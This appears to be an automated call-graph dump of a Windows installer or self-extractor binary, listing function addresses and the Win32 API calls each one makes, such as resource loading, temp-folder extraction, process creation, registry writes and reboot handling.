10311d 3196->3202 3197->3198 3201 1043d0 11 API calls 3199->3201 3200 103138 EndDialog 3200->3198 3203 10315d 6 API calls 3201->3203 3202->3198 3202->3200 3203->3198 3204 104bc0 3206 104bd7 3204->3206 3207 104c05 3204->3207 3205 104c1b SetFilePointer 3205->3206 3207->3205 3207->3206 3208 1030c0 3209 1030de CallWindowProcA 3208->3209 3210 1030ce 3208->3210 3211 1030da 3209->3211 3210->3209 3210->3211 3212 1063c0 3213 106407 3212->3213 3214 10658a CharPrevA 3213->3214 3215 106415 CreateFileA 3214->3215 3216 106448 WriteFile 3215->3216 3217 10643a 3215->3217 3218 106465 CloseHandle 3216->3218 3220 106ce0 4 API calls 3217->3220 3218->3217 3221 10648f 3220->3221 3222 106c03 3223 106c17 _exit 3222->3223 3224 106c1e 3222->3224 3223->3224 3225 106c27 _cexit 3224->3225 3226 106c32 3224->3226 3225->3226 3227 107270 _except_handler4_common 3228 1069b0 3229 1069b5 3228->3229 3237 106fbe GetModuleHandleW 3229->3237 3231 1069c1 __set_app_type __p__fmode __p__commode 3232 1069f9 3231->3232 3233 106a02 __setusermatherr 3232->3233 3234 106a0e 3232->3234 3233->3234 3239 1071ef _controlfp 3234->3239 3236 106a13 3238 106fcf 3237->3238 3238->3231 3239->3236 3240 1034f0 3241 103504 3240->3241 3242 1035b8 3240->3242 3241->3242 3243 10351b 3241->3243 3244 1035be GetDesktopWindow 3241->3244 3245 103526 3242->3245 3246 103671 EndDialog 3242->3246 3248 10354f 3243->3248 3249 10351f 3243->3249 3247 1043d0 11 API calls 3244->3247 3246->3245 3250 1035d6 3247->3250 3248->3245 3252 103559 ResetEvent 3248->3252 3249->3245 3251 10352d TerminateThread EndDialog 3249->3251 3253 1035e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3250->3253 3254 10361d SetWindowTextA CreateThread 3250->3254 3251->3245 3255 1044b9 20 API calls 3252->3255 3253->3254 3254->3245 3256 103646 3254->3256 3257 103581 3255->3257 3259 1044b9 20 API calls 3256->3259 3258 10359b SetEvent 3257->3258 3260 10358a SetEvent 3257->3260 3261 103680 4 API calls 3258->3261 3259->3242 3260->3245 3261->3242 3262 106ef0 3263 106f2d 3262->3263 3264 106f02 3262->3264 3264->3263 3265 106f27 ?terminate@ 3264->3265 3265->3263 2355 104ca0 GlobalAlloc 2356 106a60 2373 107155 2356->2373 2358 106a65 2359 106a76 GetStartupInfoW 2358->2359 2360 106a93 2359->2360 2361 106aa8 2360->2361 2362 106aaf Sleep 2360->2362 2363 106ac7 _amsg_exit 2361->2363 2365 106ad1 2361->2365 2362->2360 2363->2365 2364 106b13 _initterm 2368 106b2e __IsNonwritableInCurrentImage 2364->2368 2365->2364 2367 106af4 2365->2367 2365->2368 2366 106bd6 _ismbblead 2366->2368 2368->2366 2369 106c1e 2368->2369 2372 106bbe exit 2368->2372 2378 102bfb GetVersion 2368->2378 2369->2367 2371 106c27 _cexit 2369->2371 2371->2367 2372->2368 2374 10717a 2373->2374 2375 10717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 1071e2 2374->2376 2377 1071cd 2375->2377 2376->2358 2377->2376 2379 102c50 2378->2379 2380 102c0f 2378->2380 2395 102caa memset memset memset 2379->2395 2380->2379 2382 102c13 GetModuleHandleW 2380->2382 2382->2379 2384 102c22 GetProcAddress 2382->2384 2384->2379 2392 102c34 2384->2392 2385 102c8e 2387 102c97 CloseHandle 2385->2387 2388 102c9e 2385->2388 2387->2388 2388->2368 2392->2379 2393 102c89 2489 101f90 2393->2489 2506 10468f FindResourceA SizeofResource 2395->2506 2398 102ef3 2401 1044b9 20 API calls 2398->2401 2399 102d2d CreateEventA SetEvent 2400 10468f 7 API calls 2399->2400 2403 102d57 2400->2403 2402 102d6e 2401->2402 2405 106ce0 4 API calls 2402->2405 2404 102d5b 2403->2404 2406 102e1f 2403->2406 2410 10468f 7 API calls 2403->2410 2407 1044b9 20 API calls 2404->2407 2409 102c62 2405->2409 2511 105c9e 2406->2511 2407->2402 2409->2385 2436 102f1d 2409->2436 2412 102d9f 2410->2412 2412->2404 2415 102da3 CreateMutexA 2412->2415 2413 102e30 2413->2398 2414 102e3a 2416 102e52 FindResourceA 2414->2416 2417 102e43 2414->2417 2415->2406 2418 102dbd GetLastError 2415->2418 2421 102e64 LoadResource 2416->2421 2422 102e6e 2416->2422 2537 102390 2417->2537 2418->2406 2420 102dca 2418->2420 2424 102dd5 2420->2424 2425 102dea 2420->2425 2421->2422 2423 102e4d 2422->2423 2552 1036ee GetVersionExA 2422->2552 2423->2402 2426 1044b9 20 API calls 2424->2426 2427 1044b9 20 API calls 2425->2427 2428 102de8 2426->2428 2429 102dff 2427->2429 2431 102e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2402 2435 106517 24 API calls 2435->2423 2437 102f6c 2436->2437 2438 102f3f 2436->2438 2660 105164 2437->2660 2440 102f5f 2438->2440 2641 1051e5 2438->2641 2788 103a3f 2440->2788 2442 102f71 2472 10303c 2442->2472 2673 1055a0 2442->2673 2448 106ce0 4 API calls 2449 102c6b 2448->2449 2476 1052b6 2449->2476 2450 102f86 GetSystemDirectoryA 2451 10658a CharPrevA 2450->2451 2452 102fab LoadLibraryA 2451->2452 2453 102fc0 GetProcAddress 2452->2453 2454 102ff7 FreeLibrary 2452->2454 2453->2454 2457 102fd6 DecryptFileA 2453->2457 2455 103006 2454->2455 2456 103017 SetCurrentDirectoryA 2454->2456 2455->2456 2721 10621e GetWindowsDirectoryA 2455->2721 2458 103054 2456->2458 2459 103026 2456->2459 2457->2454 2464 102ff0 2457->2464 2461 103061 2458->2461 2731 103b26 2458->2731 2463 1044b9 20 API calls 2459->2463 2466 10307a 2461->2466 2461->2472 2740 10256d 2461->2740 2468 103037 2463->2468 2464->2454 2470 103098 2466->2470 2751 103ba2 2466->2751 2807 106285 GetLastError 2468->2807 2470->2472 2473 1030af 2470->2473 2472->2448 2809 104169 2473->2809 2477 1052d6 2476->2477 2485 105316 2476->2485 2480 105300 LocalFree LocalFree 2477->2480 2481 1052eb SetFileAttributesA DeleteFileA 2477->2481 2478 105374 2479 10538c 2478->2479 3115 101fe1 2478->3115 2482 106ce0 4 API calls 2479->2482 2480->2477 2480->2485 2481->2480 2484 102c72 2482->2484 2484->2385 2484->2393 2485->2478 2486 10535e SetCurrentDirectoryA 2485->2486 2487 1065e8 4 API calls 2485->2487 2488 102390 13 API calls 2486->2488 2487->2486 2488->2478 2490 101f9f 2489->2490 2491 101f9a 2489->2491 2493 1044b9 20 API calls 2490->2493 2496 101fd9 2490->2496 2497 101fc0 2490->2497 2492 101ea7 15 API calls 2491->2492 2492->2490 2493->2497 2494 101ee2 GetCurrentProcess OpenProcessToken 2499 101f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2494->2499 2500 101f0e 2494->2500 2495 101fcf ExitWindowsEx 2495->2496 2496->2385 2497->2494 2497->2495 2497->2496 2499->2500 2501 101f6b ExitWindowsEx 2499->2501 2503 1044b9 20 API calls 2500->2503 2501->2500 2502 101f1f 2501->2502 2504 106ce0 4 API calls 2502->2504 2503->2502 2505 101f8c 2504->2505 2505->2385 2507 1046b6 2506->2507 2508 102d1a 2506->2508 2507->2508 2509 1046be FindResourceA LoadResource LockResource 2507->2509 2508->2398 2508->2399 2509->2508 2510 1046df memcpy_s FreeResource 2509->2510 2510->2508 2518 105e17 2511->2518 2535 105cc3 2511->2535 2512 105dd0 2516 105dec GetModuleFileNameA 2512->2516 2512->2518 2513 106ce0 4 API calls 2515 102e2c 2513->2515 2514 105ced CharNextA 2514->2535 2515->2413 2515->2414 2517 105e0a 2516->2517 2516->2518 2587 1066c8 2517->2587 2518->2513 2520 106218 2596 106e2a 2520->2596 2523 105e36 CharUpperA 2524 1061d0 2523->2524 2523->2535 2525 1044b9 20 API calls 2524->2525 2526 1061e7 2525->2526 2527 1061f0 CloseHandle 2526->2527 2528 1061f7 ExitProcess 2526->2528 2527->2528 2529 105f9f CharUpperA 2529->2535 2530 105f59 CompareStringA 2530->2535 2531 106003 CharUpperA 2531->2535 2532 105edc CharUpperA 2532->2535 2533 1060a2 CharUpperA 2533->2535 2534 10667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 10658a 2535->2592 2538 1024cb 2537->2538 2541 1023b9 2537->2541 2539 106ce0 4 API calls 2538->2539 2540 1024dc 2539->2540 2540->2423 2541->2538 2542 1023e9 FindFirstFileA 2541->2542 2542->2538 2550 102407 2542->2550 2543 102421 lstrcmpA 2545 102431 lstrcmpA 2543->2545 2546 1024a9 FindNextFileA 2543->2546 2544 102479 2547 102488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 1024bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 10658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 102390 5 API calls 2550->2551 2551->2550 2557 103737 2552->2557 2559 10372d 2552->2559 2553 1044b9 20 API calls 2554 1039fc 2553->2554 2555 106ce0 4 API calls 2554->2555 2556 102e92 2555->2556 2556->2402 2556->2423 2567 1018a3 2556->2567 2557->2554 2557->2559 2560 1038a4 2557->2560 2603 1028e8 2557->2603 2559->2553 2559->2554 2560->2554 2560->2559 2561 1039c1 MessageBeep 2560->2561 2562 10681f 10 API calls 2561->2562 2563 1039ce 2562->2563 2564 1039d8 MessageBoxA 2563->2564 2565 1067c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 1018d5 2567->2568 2574 1019b8 2567->2574 2632 1017ee LoadLibraryA 2568->2632 2570 106ce0 4 API calls 2572 1019d5 2570->2572 2572->2423 2572->2435 2573 1018e5 GetCurrentProcess OpenProcessToken 2573->2574 2575 101900 GetTokenInformation 2573->2575 2574->2570 2576 101918 GetLastError 2575->2576 2577 1019aa CloseHandle 2575->2577 2576->2577 2578 101927 LocalAlloc 2576->2578 2577->2574 2579 101938 GetTokenInformation 2578->2579 2580 1019a9 2578->2580 2581 1019a2 LocalFree 2579->2581 2582 10194e AllocateAndInitializeSid 2579->2582 2580->2577 2581->2580 2582->2581 2583 10196e 2582->2583 2584 101999 FreeSid 2583->2584 2585 101975 EqualSid 2583->2585 2586 10198c 2583->2586 2584->2581 2585->2583 2585->2586 2586->2584 2588 1066d5 2587->2588 2589 1066f3 2588->2589 2591 1066e5 CharNextA 2588->2591 2599 106648 2588->2599 2589->2518 2591->2588 2593 10659b 2592->2593 2593->2593 2594 1065b8 CharPrevA 2593->2594 2595 1065ab 2593->2595 2594->2595 2595->2535 2602 106cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 10621d 2600 10665d IsDBCSLeadByte 2599->2600 2601 106668 2599->2601 2600->2601 2601->2588 2602->2598 2604 102a62 2603->2604 2611 10290d 2603->2611 2605 102a75 2604->2605 2606 102a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608 102955 GlobalAlloc 2608->2604 2609 102968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 102a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 102a80 GlobalUnlock 2611->2612 2613 102773 2611->2613 2612->2604 2614 1028b2 2613->2614 2615 1027a3 CharUpperA CharNextA CharNextA 2613->2615 2616 1028b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 1027db 2615->2617 2620 1028bf 2616->2620 2618 1027e3 2617->2618 2619 1028a8 GetWindowsDirectoryA 2617->2619 2624 10658a CharPrevA 2618->2624 2619->2620 2621 1028d2 2620->2621 2622 10658a CharPrevA 2620->2622 2623 106ce0 4 API calls 2621->2623 2622->2621 2625 1028e2 2623->2625 2626 102810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 102837 RegQueryValueExA 2626->2627 2628 10289a RegCloseKey 2627->2628 2629 10285c 2627->2629 2628->2620 2630 102867 ExpandEnvironmentStringsA 2629->2630 2631 10287a 2629->2631 2630->2631 2631->2628 2633 101890 2632->2633 2634 101826 GetProcAddress 2632->2634 2635 106ce0 4 API calls 2633->2635 2636 101889 FreeLibrary 2634->2636 2637 101839 AllocateAndInitializeSid 2634->2637 2638 10189f 2635->2638 2636->2633 2637->2636 2640 10185f FreeSid 2637->2640 2638->2573 2638->2574 2640->2636 2642 10468f 7 API calls 2641->2642 2643 1051f9 LocalAlloc 2642->2643 2644 10522d 2643->2644 2645 10520d 2643->2645 2647 10468f 7 API calls 2644->2647 2646 1044b9 20 API calls 2645->2646 2648 10521e 2646->2648 2649 10523a 2647->2649 2650 106285 GetLastError 2648->2650 2651 105262 lstrcmpA 2649->2651 2652 10523e 2649->2652 2659 102f4d 2650->2659 2653 105272 LocalFree 2651->2653 2654 10527e 2651->2654 2655 1044b9 20 API calls 2652->2655 2653->2659 2656 1044b9 20 API calls 2654->2656 2657 10524f LocalFree 2655->2657 2658 105290 LocalFree 2656->2658 2657->2659 2658->2659 2659->2437 2659->2440 2659->2472 2661 10468f 7 API calls 2660->2661 2662 105175 2661->2662 2663 10517a 2662->2663 2664 1051af 2662->2664 2665 1044b9 20 API calls 2663->2665 2666 10468f 7 API calls 2664->2666 2667 10518d 2665->2667 2668 1051c0 2666->2668 2667->2442 2822 106298 2668->2822 2671 1051e1 2671->2442 2672 1044b9 20 API calls 2672->2667 2674 10468f 7 API calls 2673->2674 2675 1055c7 LocalAlloc 2674->2675 2676 1055db 2675->2676 2677 1055fd 2675->2677 2679 1044b9 20 API calls 2676->2679 2678 10468f 7 API calls 2677->2678 2680 10560a 2678->2680 2681 1055ec 2679->2681 2683 105632 lstrcmpA 2680->2683 2684 10560e 2680->2684 2682 106285 GetLastError 2681->2682 2696 1055f1 2682->2696 2686 105645 2683->2686 2687 10564b LocalFree 2683->2687 2685 1044b9 20 API calls 2684->2685 2688 10561f LocalFree 2685->2688 2686->2687 2689 105696 2687->2689 2690 10565b 2687->2690 2688->2696 2691 10589f 2689->2691 2694 1056ae GetTempPathA 2689->2694 2695 105467 49 API calls 2690->2695 2692 106517 24 API calls 2691->2692 2692->2696 2693 106ce0 4 API calls 2697 102f7e 2693->2697 2698 1056c3 2694->2698 2701 1056eb 2694->2701 2699 105678 2695->2699 2696->2693 2697->2450 2697->2472 2834 105467 2698->2834 2699->2696 2703 1044b9 20 API calls 2699->2703 2701->2696 2704 105717 GetDriveTypeA 2701->2704 2705 10586c GetWindowsDirectoryA 2701->2705 2703->2696 2706 105730 GetFileAttributesA 2704->2706 2719 10572b 2704->2719 2868 10597d GetCurrentDirectoryA SetCurrentDirectoryA 2705->2868 2706->2719 2710 105467 49 API calls 2710->2701 2711 102630 21 API calls 2711->2719 2713 1057c1 GetWindowsDirectoryA 2713->2719 2714 10597d 34 API calls 2714->2719 2715 10658a CharPrevA 2716 1057e8 GetFileAttributesA 2715->2716 2717 1057fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 105827 SetFileAttributesA 2718->2719 2719->2696 2719->2704 2719->2705 2719->2706 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 105467 49 API calls 2719->2720 2864 106952 2719->2864 2720->2719 2722 106268 2721->2722 2723 106249 2721->2723 2725 10597d 34 API calls 2722->2725 2724 1044b9 20 API calls 2723->2724 2726 10625a 2724->2726 2727 10625f 2725->2727 2728 106285 GetLastError 2726->2728 2729 106ce0 4 API calls 2727->2729 2728->2727 2730 103013 2729->2730 2730->2456 2730->2472 2732 103b2d 2731->2732 2732->2732 2733 103b72 2732->2733 2735 103b53 2732->2735 2934 104fe0 2733->2934 2736 106517 24 API calls 2735->2736 2737 103b70 2736->2737 2738 106298 10 API calls 2737->2738 2739 103b7b 2737->2739 2738->2739 2739->2461 2741 102622 2740->2741 2742 102583 2740->2742 2961 1024e0 GetWindowsDirectoryA 2741->2961 2744 1025e8 RegOpenKeyExA 2742->2744 2745 10258b 2742->2745 2746 1025e3 2744->2746 2747 102609 RegQueryInfoKeyA 2744->2747 2745->2746 2749 10259b RegOpenKeyExA 2745->2749 2746->2466 2748 1025d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1025bc RegQueryValueExA 2749->2750 2750->2748 2752 103bdb 2751->2752 2764 103bec 2751->2764 2753 10468f 7 API calls 2752->2753 2753->2764 2754 103c03 memset 2754->2764 2755 103d13 2756 1044b9 20 API calls 2755->2756 2762 103d26 2756->2762 2757 10468f 7 API calls 2757->2764 2759 106ce0 4 API calls 2760 103f60 2759->2760 2760->2470 2761 103d7b CompareStringA 2761->2764 2773 103fd7 2761->2773 2762->2759 2763 103fab 2767 1044b9 20 API calls 2763->2767 2764->2754 2764->2755 2764->2757 2764->2761 2764->2762 2764->2763 2768 103f46 LocalFree 2764->2768 2769 103f1e LocalFree 2764->2769 2764->2773 2774 103cc7 CompareStringA 2764->2774 2785 103e10 2764->2785 2969 101ae8 2764->2969 3010 10202a memset memset RegCreateKeyExA 2764->3010 3036 103fef 2764->3036 2771 103fbe LocalFree 2767->2771 2768->2762 2769->2764 2769->2773 2771->2762 2773->2762 3060 102267 2773->3060 2774->2764 2775 103f92 2778 1044b9 20 API calls 2775->2778 2776 103e1f GetProcAddress 2777 103f64 2776->2777 2776->2785 2779 1044b9 20 API calls 2777->2779 2780 103fa9 2778->2780 2781 103f75 FreeLibrary 2779->2781 2782 103f7c LocalFree 2780->2782 2781->2782 2783 106285 GetLastError 2782->2783 2784 103f8b 2783->2784 2784->2762 2785->2775 2785->2776 2786 103f40 FreeLibrary 2785->2786 2787 103eff FreeLibrary 2785->2787 3050 106495 2785->3050 2786->2768 2787->2769 2789 10468f 7 API calls 2788->2789 2790 103a55 LocalAlloc 2789->2790 2791 103a6c 2790->2791 2792 103a8e 2790->2792 2793 1044b9 20 API calls 2791->2793 2794 10468f 7 API calls 2792->2794 2795 103a7d 2793->2795 2796 103a98 2794->2796 2797 106285 GetLastError 2795->2797 2798 103ac5 lstrcmpA 2796->2798 2799 103a9c 2796->2799 2805 102f64 2797->2805 2801 103ada 2798->2801 2802 103b0d LocalFree 2798->2802 2800 1044b9 20 API calls 2799->2800 2803 103aad LocalFree 2800->2803 2804 106517 24 API calls 2801->2804 2802->2805 2803->2805 2806 103aec LocalFree 2804->2806 2805->2437 2805->2472 2806->2805 2808 10628f 2807->2808 2808->2472 2810 10468f 7 API calls 2809->2810 2811 10417d LocalAlloc 2810->2811 2812 104195 2811->2812 2813 1041a8 2811->2813 2814 1044b9 20 API calls 2812->2814 2815 10468f 7 API calls 2813->2815 2817 1041a6 2814->2817 2816 1041b5 2815->2816 2818 1041c5 lstrcmpA 2816->2818 2819 1041b9 2816->2819 2817->2472 2818->2819 2820 1041e6 LocalFree 2818->2820 2821 1044b9 20 API calls 2819->2821 2820->2817 2821->2820 2823 10171e _vsnprintf 2822->2823 2824 1062c9 FindResourceA 2823->2824 2826 106353 2824->2826 2827 1062cb LoadResource LockResource 2824->2827 2828 106ce0 4 API calls 2826->2828 2827->2826 2830 1062e0 2827->2830 2829 1051ca 2828->2829 2829->2671 2829->2672 2831 106355 FreeResource 2830->2831 2832 10631b FreeResource 2830->2832 2831->2826 2833 10171e _vsnprintf 2832->2833 2833->2824 2835 10548a 2834->2835 2853 10551a 2834->2853 2894 1053a1 2835->2894 2837 105581 2841 106ce0 4 API calls 2837->2841 2840 105495 2840->2837 2844 1054c2 GetSystemInfo 2840->2844 2845 10550c 2840->2845 2846 10559a 2841->2846 2842 10553b CreateDirectoryA 2847 105577 2842->2847 2848 105547 2842->2848 2843 10554d 2843->2837 2852 10597d 34 API calls 2843->2852 2851 1054da 2844->2851 2849 10658a CharPrevA 2845->2849 2846->2696 2858 102630 GetWindowsDirectoryA 2846->2858 2850 106285 GetLastError 2847->2850 2848->2843 2849->2853 2854 10557c 2850->2854 2851->2845 2856 10658a CharPrevA 2851->2856 2855 10555c 2852->2855 2905 1058c8 2853->2905 2854->2837 2855->2837 2857 105568 RemoveDirectoryA 2855->2857 2856->2845 2857->2837 2859 10265e 2858->2859 2860 10266f 2858->2860 2861 1044b9 20 API calls 2859->2861 2862 106ce0 4 API calls 2860->2862 2861->2860 2863 102687 2862->2863 2863->2701 2863->2710 2865 1069a1 2864->2865 2866 10696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 106989 MulDiv 2866->2867 2867->2865 2869 1059bb 2868->2869 2870 1059dd GetDiskFreeSpaceA 2868->2870 2873 1044b9 20 API calls 2869->2873 2871 105ba1 memset 2870->2871 2872 105a21 MulDiv 2870->2872 2874 106285 GetLastError 2871->2874 2872->2871 2875 105a50 GetVolumeInformationA 2872->2875 2876 1059cc 2873->2876 2877 105bbc GetLastError FormatMessageA 2874->2877 2878 105ab5 SetCurrentDirectoryA 2875->2878 2879 105a6e memset 2875->2879 2880 106285 GetLastError 2876->2880 2881 105be3 2877->2881 2889 105acc 2878->2889 2882 106285 GetLastError 2879->2882 2887 1059d1 2880->2887 2883 1044b9 20 API calls 2881->2883 2884 105a89 GetLastError FormatMessageA 2882->2884 2885 105bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 106ce0 4 API calls 2888 105c11 2886->2888 2887->2886 2888->2701 2890 105b0a 2889->2890 2892 105b20 2889->2892 2891 1044b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 10268b 2892->2917 2896 1053bf 2894->2896 2895 10171e _vsnprintf 2895->2896 2896->2895 2897 10658a CharPrevA 2896->2897 2900 105415 GetTempFileNameA 2896->2900 2898 1053fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 10544f CreateDirectoryA 2898->2899 2899->2900 2901 10543a 2899->2901 2900->2901 2902 105429 DeleteFileA CreateDirectoryA 2900->2902 2903 106ce0 4 API calls 2901->2903 2902->2901 2904 105449 2903->2904 2904->2840 2906 1058d8 2905->2906 2906->2906 2907 1058df LocalAlloc 2906->2907 2908 1058f3 2907->2908 2909 105919 2907->2909 2910 1044b9 20 API calls 2908->2910 2912 10658a CharPrevA 2909->2912 2916 105906 2910->2916 2911 106285 GetLastError 2914 105534 2911->2914 2913 105931 CreateFileA LocalFree 2912->2913 2915 10595b CloseHandle GetFileAttributesA 2913->2915 2913->2916 2914->2842 2914->2843 2915->2916 2916->2911 2916->2914 2918 1026e5 2917->2918 2919 1026b9 2917->2919 2921 1026ea 2918->2921 2922 10271f 2918->2922 2920 10171e _vsnprintf 2919->2920 2924 1026cc 2920->2924 2923 10171e _vsnprintf 2921->2923 2926 10171e _vsnprintf 2922->2926 2932 1026e3 2922->2932 2925 1026fd 2923->2925 2928 1044b9 20 API calls 2924->2928 2929 1044b9 20 API calls 2925->2929 2930 102735 2926->2930 2927 106ce0 4 API calls 2931 10276d 2927->2931 2928->2932 2929->2932 2933 1044b9 20 API calls 2930->2933 2931->2887 2932->2927 2933->2932 2935 10468f 7 API calls 2934->2935 2936 104ff5 FindResourceA LoadResource LockResource 2935->2936 2937 105020 2936->2937 2950 10515f 2936->2950 2938 105057 2937->2938 2939 105029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 104efd 2938->2953 2939->2938 2942 105060 2944 1044b9 20 API calls 2942->2944 2943 10507c 2945 105075 2943->2945 2947 1044b9 20 API calls 2943->2947 2944->2945 2946 105110 FreeResource 2945->2946 2948 10511d 2945->2948 2946->2948 2947->2945 2949 10513a 2948->2949 2951 1044b9 20 API calls 2948->2951 2949->2950 2952 10514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 104f4a 2953->2954 2955 104980 25 API calls 2954->2955 2960 104fa1 2954->2960 2957 104f67 2955->2957 2956 106ce0 4 API calls 2958 104fc6 2956->2958 2959 104b60 FindCloseChangeNotification 2957->2959 2957->2960 2958->2942 2958->2943 2959->2960 2960->2956 2962 102510 2961->2962 2963 10255b 2961->2963 2965 10658a CharPrevA 2962->2965 2964 106ce0 4 API calls 2963->2964 2966 102569 2964->2966 2967 102522 WritePrivateProfileStringA _lopen 2965->2967 2966->2746 2967->2963 2968 102548 _llseek _lclose 2967->2968 2968->2963 2970 101b25 2969->2970 3074 101a84 2970->3074 2972 101b57 2973 10658a CharPrevA 2972->2973 2975 101b8c 2972->2975 2973->2975 2974 1066c8 2 API calls 2976 101bd1 2974->2976 2975->2974 2977 101d73 2976->2977 2978 101bd9 CompareStringA 2976->2978 2980 1066c8 2 API calls 2977->2980 2978->2977 2979 101bf7 GetFileAttributesA 2978->2979 2981 101d53 2979->2981 2982 101c0d 2979->2982 2983 101d7d 2980->2983 2984 101d64 2981->2984 2982->2981 2989 101a84 2 API calls 2982->2989 2985 101d81 CompareStringA 2983->2985 2986 101df8 LocalAlloc 2983->2986 2987 1044b9 20 API calls 2984->2987 2985->2986 2995 101d9b 2985->2995 2986->2984 2988 101e0b GetFileAttributesA 2986->2988 2990 101d6c 2987->2990 2991 101e1d 2988->2991 3008 101e45 2988->3008 2992 101c31 2989->2992 2994 106ce0 4 API calls 2990->2994 2991->3008 2993 101c50 LocalAlloc 2992->2993 2998 101a84 2 API calls 2992->2998 2993->2984 2996 101c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2997 101ea1 2994->2997 2995->2995 2999 101dbe LocalAlloc 2995->2999 3002 101cf8 2996->3002 3007 101cc2 2996->3007 2997->2764 2998->2993 2999->2984 3003 101de1 2999->3003 3004 101d23 3002->3004 3005 101d09 GetShortPathNameA 3002->3005 3006 10171e _vsnprintf 3003->3006 3009 10171e _vsnprintf 3004->3009 3005->3004 3006->3007 3007->2990 3080 102aac 3008->3080 3009->3007 3011 10209a 3010->3011 3019 102256 3010->3019 3014 10171e _vsnprintf 3011->3014 3016 1020dc 3011->3016 3012 106ce0 4 API calls 3013 102263 3012->3013 3013->2764 3015 1020af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1020e4 RegCloseKey 3016->3017 3018 1020fb GetSystemDirectoryA 3016->3018 3017->3019 3020 10658a CharPrevA 3018->3020 3019->3012 3021 10211b LoadLibraryA 3020->3021 3022 102179 GetModuleFileNameA 3021->3022 3023 10212e GetProcAddress FreeLibrary 3021->3023 3025 1021de RegCloseKey 3022->3025 3028 102177 3022->3028 3023->3022 3024 10214e GetSystemDirectoryA 3023->3024 3026 102165 3024->3026 3024->3028 3025->3019 3027 10658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1021b7 LocalAlloc 3028->3029 3030 1021ec 3029->3030 3031 1021cd 3029->3031 3033 10171e _vsnprintf 3030->3033 3032 1044b9 20 API calls 3031->3032 3032->3025 3034 102218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 104016 CreateProcessA 3036->3037 3048 104106 3036->3048 3038 104041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 1040c4 3037->3039 3042 104070 3038->3042 3041 106285 GetLastError 3039->3041 3040 106ce0 4 API calls 3043 104117 3040->3043 3044 1040c9 GetLastError FormatMessageA 3041->3044 3107 10411b 3042->3107 3043->2764 3046 1044b9 20 API calls 3044->3046 3046->3048 3047 104096 CloseHandle CloseHandle 3047->3048 3049 1040ba 3047->3049 3048->3040 3049->3048 3051 1064c2 3050->3051 3052 10658a CharPrevA 3051->3052 3053 1064d8 GetFileAttributesA 3052->3053 3054 106501 LoadLibraryA 3053->3054 3055 1064ea 3053->3055 3057 106508 3054->3057 3055->3054 3056 1064ee LoadLibraryExA 3055->3056 3056->3057 3058 106ce0 4 API calls 3057->3058 3059 106513 3058->3059 3059->2785 3061 102381 3060->3061 3062 102289 RegOpenKeyExA 3060->3062 3063 106ce0 4 API calls 3061->3063 3062->3061 3064 1022b1 RegQueryValueExA 3062->3064 3065 10238c 3063->3065 3066 102374 RegCloseKey 3064->3066 3067 1022e6 memset GetSystemDirectoryA 3064->3067 3065->2762 3066->3061 3068 102321 3067->3068 3069 10230f 3067->3069 3071 10171e _vsnprintf 3068->3071 3070 10658a CharPrevA 3069->3070 3070->3068 3072 10233f 3071->3072 3072->3072 3073 102353 RegSetValueExA 3072->3073 3073->3066 3075 101a9a 3074->3075 3077 101aba 3075->3077 3079 101aaf 3075->3079 3093 10667f 3075->3093 3077->2972 3078 10667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 102ad4 GetModuleFileNameA 3080->3081 3082 102be6 3080->3082 3092 102b02 3081->3092 3083 106ce0 4 API calls 3082->3083 3085 102bf5 3083->3085 3084 102af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 102b11 CharNextA CharUpperA 3089 102b8d CharUpperA 3086->3089 3086->3092 3087 102bca CharNextA 3088 102bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 102b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 1065e8 3092->3098 3094 106689 3093->3094 3095 1066a5 3094->3095 3096 106648 IsDBCSLeadByte 3094->3096 3097 106697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1065f4 3098->3099 3099->3099 3100 1065fb CharPrevA 3099->3100 3101 106611 CharPrevA 3100->3101 3102 10660b 3101->3102 3103 10661e 3101->3103 3102->3101 3102->3103 3104 10663d 3103->3104 3105 106634 CharNextA 3103->3105 3106 106627 CharPrevA 3103->3106 3104->3092 3105->3104 3106->3104 3106->3105 3108 104132 3107->3108 3110 10412a 3107->3110 3111 101ea7 3108->3111 3110->3047 3112 101ed3 3111->3112 3113 101eba 3111->3113 3112->3110 3114 10256d 15 API calls 3113->3114 3114->3112 3116 101ff0 RegOpenKeyExA 3115->3116 3117 102026 3115->3117 3116->3117 3118 10200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 